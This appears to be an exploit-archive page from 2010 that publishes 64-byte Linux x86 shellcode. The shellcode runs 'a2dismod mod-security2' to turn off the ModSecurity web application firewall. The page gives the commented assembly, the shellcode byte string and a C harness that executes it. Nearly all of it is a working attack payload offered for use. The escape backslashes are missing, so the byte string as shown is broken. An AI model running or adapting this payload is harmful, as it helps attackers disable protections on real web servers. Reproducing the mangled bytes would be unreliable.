[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Linux x86 - disabled modsecurity - 64 bytes
# Published : 2010-03-04
# Author : sekfault
# Previous Title : JITed stage-0 shellcode
# Next Title : Windows XP Home Edition SP3 English ( calc.exe ) 37 bytes


/* sekfault@shellcode.com.ar - Goodfellas Security Research Team - 2010
 * /usr/sbin/a2dismod mod-security2 - disable modsecurity
 * 64 bytes
 *__asm__(
 *                "xor %eax,%eax n"
 *                 "push %eax n"
 *                 "cdq n"
 *                 "push $0x646f6d73 n"
 *                 "push $0x69643261 n"
 *                 "push $0x2f6e6962 n"
 *                 "push $0x732f7273 n"
 *                 "push $0x752f2f2f n"
 *                 "mov %esp,%ebx n"
 *                 "push $0x32 n"
 *                 "push $0x79746972 n"
 *                 "push $0x75636573 n"
 *                 "push $0x2d646f6d n"
 *                 "mov %esp,%ecx n"
 *                 "xor %edx,%edx n"
 *                 "mov $0xb,%al n"
 *                 "push %edx n"
 *                 "push %ecx n"
 *                 "push %ebx n"
 *                 "mov %esp,%ecx n"
 *                 "mov %esp,%edx n"
 *                 "int $0x80 n"
                   );
 */
char shellcode[]="x31xc0x50x99x68x73x6dx6fx64x68x61x32x64x69x68x62x69x6ex2fx68x73x72x2fx73x68x2fx2fx2fx75x89xe3x6ax32x68x72x69x74x79x68x73x65x63x75x68x6dx6fx64x2dx89xe1x31xd2xb0x0bx52x51x53x89xe1x89xe2xcdx80";

int main()
{
        (*(void(*)())shellcode)();
        return 0;
}